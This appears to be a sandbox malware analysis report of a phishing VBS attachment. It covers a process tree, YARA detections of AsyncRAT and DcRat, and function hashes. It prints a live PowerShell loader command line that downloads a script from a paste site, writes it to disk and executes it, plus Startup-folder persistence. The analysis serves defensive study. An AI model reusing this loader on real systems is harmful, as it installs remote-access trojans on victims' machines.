a%f8%a4%8e%d9%8f%60%aaq%2b%ecN%b6%26%93%f1%f0%f8%1c%aa(%ac%a41%f6E%d3%b4%d1%d34tF%08%0d%2f%a2%b5%26%12%a1%d9%f1%c8%3c%db%7e%9a%bch%dd.%d0%3a%8e%882%1b%8c%1fHW%0d5e93%05%e3X%ce%ae8%d6%f6%b0%91Ya%f5%a1%25%da%0d%d3%c1%0c%cf%af%c4%8e%9c%0aO%cf%c59U%3b%bf%
2022-05-16 17:29:33 UTC	64	IN	Data Raw: 39 25 39 66 43 25 62 61 25 64 38 6f 25 66 64 25 39 63 25 66 35 25 63 35 25 37 65 25 66 33 25 61 64 25 65 61 25 63 64 25 66 34 57 25 33 64 25 66 30 25 65 66 62 25 37 66 25 66 62 25 35 63 25 38 34 25 37 65 32 6e 73 34 34 25 39 37 25 38 63 25 30 37 25 32 33 25 31 37 25 66 62 53 5f 25 64 63 25 30 66 25 31 39 25 30 37 42 25 64 31 25 63 64 25 65 33 4d 4d 25 63 31 25 30 64 25 31 33 25 31 62 36 25 64 36 25 62 37 34 25 61 65 25 30 66 25 64 35 35 25 62 37 78 25 39 35 21 35 25 63 37 25 37 63 25 65 35 25 35 65 25 62 65 25 35 63 25 61 31 25 64 38 25 38 35 25 61 61 25 65 36 25 65 36 25 39 32 25 39 65 25 35 63 28 25 39 36 25 62 38 25 35 63 25 30 65 25 31 30 4a 25 66 32 25 33 64 25 31 37 25 65 62 42 25 32 62 71 25 61 39 2e 52 71 25 30 39 35 2a 71 25 61 61 25 62 61 4b 25 Data Ascii: 9%9fC%ba%d8o%fd%9c%f5%c5%7e%f3%ad%ea%cd%f4W%3d%f0%efb%7f%fb%5c%84%7e2ns44%97%8c%07%23%17%fbS_%dc%0f%19%07B%d1%cd%e3MM%c1%0d%13%1b6%d6%b74%ae%0f%d55%b7x%95!5%c7%7c%e5%5e%be%5c%a1%d8%85%aa%e6%e6%92%9e%5c(%96%b8%5c%0e%10J%f2%3d%17%ebB%2bq%a9.Rq%095*q%aa%baK%

Target ID:	0
Start time:	19:29:19
Start date:	16/05/2022
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Re-RFQ - PN List.vbs"
Imagebase:	0x7ff713c40000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	2
Start time:	19:29:28
Start date:	16/05/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)
Imagebase:	0x7ff620040000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RUNPE, Description: Yara detected RUNPE, Source: 00000002.00000002.535670022.000001B3C4BF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RUNPE, Description: Yara detected RUNPE, Source: 00000002.00000002.527898174.000001B3B54C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Target ID:	3
Start time:	19:29:28
Start date:	16/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6406f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	6
Start time:	19:29:39
Start date:	16/05/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Imagebase:	0x7ff620040000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RUNPE, Description: Yara detected RUNPE, Source: 00000006.00000003.432425896.0000024667561000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RUNPE, Description: Yara detected RUNPE, Source: 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Target ID:	8
Start time:	19:29:51
Start date:	16/05/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline
Imagebase:	0x7ff71a4b0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Show Windows behavior

Target ID:	9
Start time:	19:29:53
Start date:	16/05/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9E1.tmp" "c:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP"
Imagebase:	0x7ff7a0a80000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Target ID:	10
Start time:	19:29:55
Start date:	16/05/2022
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs"
Imagebase:	0x7ff713c40000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	11
Start time:	19:29:59
Start date:	16/05/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Imagebase:	0x7ff620040000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RUNPE, Description: Yara detected RUNPE, Source: 0000000B.00000002.535852707.000001D39DE83000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000B.00000002.535314776.000001D38E80B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000B.00000002.532881754.000001D38E3D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RUNPE, Description: Yara detected RUNPE, Source: 0000000B.00000003.476766953.000001D3A6611000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000B.00000002.535498230.000001D38E8A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: conhost.exePID: 7140, Parent PID: 7116

General

Target ID:	12
Start time:	19:30:00
Start date:	16/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6406f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	14
Start time:	19:30:05
Start date:	16/05/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:	0xf20000
File size:	41064 bytes
MD5 hash:	EFEC8C379D165E3F33B536739AEE26A3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000000.482202249.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 0000000E.00000002.910606131.0000000003351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000002.909303813.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000000.482568834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000000.482880549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000000.483188159.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Target ID:	15
Start time:	19:30:10
Start date:	16/05/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
Imagebase:	0x7ff71a4b0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Target ID:	16
Start time:	19:30:12
Start date:	16/05/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES14F3.tmp" "c:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP"
Imagebase:	0x7ff7a0a80000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	17
Start time:	19:30:23
Start date:	16/05/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:	0xe20000
File size:	41064 bytes
MD5 hash:	EFEC8C379D165E3F33B536739AEE26A3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000000.522369238.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000000.521087043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000000.521388482.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000002.532336594.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000000.522066240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Function 00007FFEBC8D1755 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.537605261.00007FFEBC8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffebc8d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0b51852a536b454e05ac1f754ac60b49105048c3f4f6cfe66bc83972c063645
Instruction ID: 87454878bfecec343f794aaaa8e1982c1a3c8dc0cb3f61561d0662a53be4e76b
Opcode Fuzzy Hash: d0b51852a536b454e05ac1f754ac60b49105048c3f4f6cfe66bc83972c063645
Instruction Fuzzy Hash: FB01A73010CB0C8FD744EF0CE051AA6B3E0FB85324F10052DE58AC3661DA32E881CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC9A19F3 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.537889511.00007FFEBC9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC9A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffebc9a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a919e31a4e0372ff72dbfbfc9dcbbb19a8cb2425484b1d66f258e865ccd6535
Instruction ID: 5d33b15ee0f3b63ae802cab8b1cbd21230a8dbccad09ab7de6123ed088104f48
Opcode Fuzzy Hash: 6a919e31a4e0372ff72dbfbfc9dcbbb19a8cb2425484b1d66f258e865ccd6535
Instruction Fuzzy Hash: F4F05432A0CD1E8FB65C964C74112F973D5EB85230B9452F6E14ED656ADE16AC1142C4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC9A04FA Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.537889511.00007FFEBC9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC9A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffebc9a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa83a0c4e461f6d2f3d41943911ee0775f399d639e8f8ca753fbd6c91b9abd8e
Instruction ID: fbca97b34d097a65b5724aa0aadab31b8da4e7884e342ddef960195837633cae
Opcode Fuzzy Hash: fa83a0c4e461f6d2f3d41943911ee0775f399d639e8f8ca753fbd6c91b9abd8e
Instruction Fuzzy Hash: BBF0A032F08D1D8FE7A5E61C68586F9B3D2EB9862138821A7E90EC3262DA11DC144380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC9A1A27 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.537889511.00007FFEBC9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC9A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffebc9a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85266efd602dee7cc48658aa23a1d1f1d7f41f9e7c09ed434428f88dc0bdba65
Instruction ID: df408e7826cd0ae96155b9a4d78b502aca61a980c1d5246830abfe6de6268d67
Opcode Fuzzy Hash: 85266efd602dee7cc48658aa23a1d1f1d7f41f9e7c09ed434428f88dc0bdba65
Instruction Fuzzy Hash: 6DE06532B0C91ECEB754A70CA0461F8B3D1EB45331B9011B6E24EC6576DE256C5286C4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC9A0296 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.537889511.00007FFEBC9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC9A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffebc9a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed4635a5e9c9a5aafe94ac3572e439b0e5a76b5b52043fe6017867f8ad2af18a
Instruction ID: 79b8670ba8c8f495221cc8fa964792c6308056f006f58d1a1327730dc960988d
Opcode Fuzzy Hash: ed4635a5e9c9a5aafe94ac3572e439b0e5a76b5b52043fe6017867f8ad2af18a
Instruction Fuzzy Hash: 04D0C933F1DE2E0A77A5915C38052F9A3C1E78867574412B7E91DD3655DD059C2552C0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFEBC9A0FDD Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.537889511.00007FFEBC9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC9A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffebc9a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3ace9de0e632fa2041789ec63cfec20c75cce5c9bea9667046fe8eb23dea26a
Instruction ID: 0535dbae74de2f245e1b28d4f1101f452c261d831e9c0ae9528df120416fe71a
Opcode Fuzzy Hash: f3ace9de0e632fa2041789ec63cfec20c75cce5c9bea9667046fe8eb23dea26a
Instruction Fuzzy Hash: 93E0BD6148E3C16FD3038B749825A913FB4AEA722030F82DBD1958B5B3E60D59199732

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 924, Parent PID: 6488COMMON

Executed Functions

Function 00007FFEBC8B3105 Relevance: .4, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512380006.00007FFEBC8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f180be56d0efdf3b0a6be94ab5f2ce9be2381374fd98502222c21c833cd0e8a
Instruction ID: 19473ffb37e4ba947ca6e16623c5698efe143196cd890d1465e009bfd1077914
Opcode Fuzzy Hash: 9f180be56d0efdf3b0a6be94ab5f2ce9be2381374fd98502222c21c833cd0e8a
Instruction Fuzzy Hash: 69C1A230A0CA4D8FDB85DF5CC455AAABBF1FFA9310F1442AAD549D7266CA35F841CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC8B6219 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512380006.00007FFEBC8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd9eb15b4b83721f0c431a25548779215624a73c95de3afe4ef599f2927b1395
Instruction ID: 6adc1e1766f34060af5e82a1630e66c625c5c0605888cf80b7b80a5eee2f6e07
Opcode Fuzzy Hash: dd9eb15b4b83721f0c431a25548779215624a73c95de3afe4ef599f2927b1395
Instruction Fuzzy Hash: D641F826A0C9128AE755B73CF05A6F6BBE0DF40331F140577D28CCA1B3ED18A98D8795

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC8B34FD Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512380006.00007FFEBC8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7113fa41ea8e4f6c31525cc4c459edcdec5377c43ce33a6f0a7013cf12ffe5
Instruction ID: 7ec65c05daa8ca0dd4eb72ee8d581569f8cb38a709706d3ef86595787b0c5868
Opcode Fuzzy Hash: 3d7113fa41ea8e4f6c31525cc4c459edcdec5377c43ce33a6f0a7013cf12ffe5
Instruction Fuzzy Hash: F3210A31A0C90D8FDF94EB5CC485EE977E1FF68314B1402A9D50AD72A6CE25E8828BC1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC8B2715 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512380006.00007FFEBC8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 610e45bc4706a2b43ca8612e09fb0fe38348d507d4c1a12b5ac1a4f8d67c755e
Instruction ID: c2cfda859c5a02c9e8f7140d3906798fee6084ce9c7dd86996fda781933df136
Opcode Fuzzy Hash: 610e45bc4706a2b43ca8612e09fb0fe38348d507d4c1a12b5ac1a4f8d67c755e
Instruction Fuzzy Hash: 5B214831A4C91D8FDF84EB5CC485EE97BA1EF69310F1401A9D50AD72A6CA25EC82CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC8B701D Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512380006.00007FFEBC8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a821e5f84c0db317faa0cd2d1bcb2e320f85acc35ac05e99c70d85083a96893f
Instruction ID: 764637f5ba96840944e838bb47dfc44e6e9d0515dec965763ef906dfb5880d63
Opcode Fuzzy Hash: a821e5f84c0db317faa0cd2d1bcb2e320f85acc35ac05e99c70d85083a96893f
Instruction Fuzzy Hash: BD21D11664DBD85FE30AA73D582A5E47FE1AF8623070945BBD288CB2B3D819684A8351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC980975 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512742203.00007FFEBC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22aa409c17c5daa1ebefc40a053be73f488c1aefcf82479cbd07339a0df1c220
Instruction ID: 6102af093d55c8cf89a2371ee10f21a55f66806f37fa98e7db7cf3076ea12c26
Opcode Fuzzy Hash: 22aa409c17c5daa1ebefc40a053be73f488c1aefcf82479cbd07339a0df1c220
Instruction Fuzzy Hash: FF01F531E0DA6A4FF795D61D54143B97BE1DF54260F1802BFC54EC32A2DA1AAC09C390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC8B56AA Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512380006.00007FFEBC8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6a8c67095442b8e7eb1e2fa7c08b2e52833e752e13ecde05b52d8ced2291715
Instruction ID: a5976da20d198a6dd2fb907b7532a8e0c3c006d1647c5fd816f4a5126e145c6d
Opcode Fuzzy Hash: f6a8c67095442b8e7eb1e2fa7c08b2e52833e752e13ecde05b52d8ced2291715
Instruction Fuzzy Hash: DD015E30A5CD094FE7A4EB1CD4596BAB3D1EF98311F90067EDA4DC32A5DE7A78808741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC8B7A51 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512380006.00007FFEBC8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04619356bcb449ec054fd96fc9e7a3ee0b5ec891dba3ad5f02335ce116822d9d
Instruction ID: 48789b441467d2f61c173b1e82f63ab341ccdfaad861d3726c6905bdc55e709a
Opcode Fuzzy Hash: 04619356bcb449ec054fd96fc9e7a3ee0b5ec891dba3ad5f02335ce116822d9d
Instruction Fuzzy Hash: 96017811A0E9892FD385A33C58193B27BD1DF9A212F4842FAD24CC31A7DD1AAC064390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC8B1815 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512380006.00007FFEBC8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0cff6f0e817eaf95abd3163f78c11bf9e4f6992de78abb45a49043693fe6870
Instruction ID: 3cb5af2a815330c1768ef3737479e5235c469629ca2ab37e08e7130c214874f6
Opcode Fuzzy Hash: d0cff6f0e817eaf95abd3163f78c11bf9e4f6992de78abb45a49043693fe6870
Instruction Fuzzy Hash: 1201843010CB088FD744EF0CE051AA6B3E0FB85320F10052DE58AC3261DA32E881CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC8B31EE Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512380006.00007FFEBC8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8925374f1fb4a27d4ba5d6e5c265f71a7b174709198b5464ae4add4e9887cfe
Instruction ID: 44d5c2dc90b224beb2f27e6b19a80d4524e37a1b42f5e288658d871d743c6638
Opcode Fuzzy Hash: a8925374f1fb4a27d4ba5d6e5c265f71a7b174709198b5464ae4add4e9887cfe
Instruction Fuzzy Hash: 1AF0B43175CA094FDB4CAA1CE4925B573D1EB99325B50017EE58BC22A6DD27E8428781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC8B1FFE Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512380006.00007FFEBC8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fb2e222d9cd5d5ea49ab9dd959b40f5350f24c0c9389aef0e773bec96e94253
Instruction ID: 06c4214731c3b83b406b9484749b7843fd53763ec5ade64045553332dd77ce31
Opcode Fuzzy Hash: 4fb2e222d9cd5d5ea49ab9dd959b40f5350f24c0c9389aef0e773bec96e94253
Instruction Fuzzy Hash: 1CF0B43175CA088FDB4CEA1CE4829B573D1EB99321B50053EE58BC26A6D927F843C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFEBC9858B1 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.512742203.00007FFEBC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEBC980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffebc980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445721d69ed26314000933d6c1119872dcf0f983deccd27d734c07c008881ec1
Instruction ID: 8a19d62bb9f6b91d9ed1376bc0b7babb12f1e4871699ffad5fb528645bb59e1e
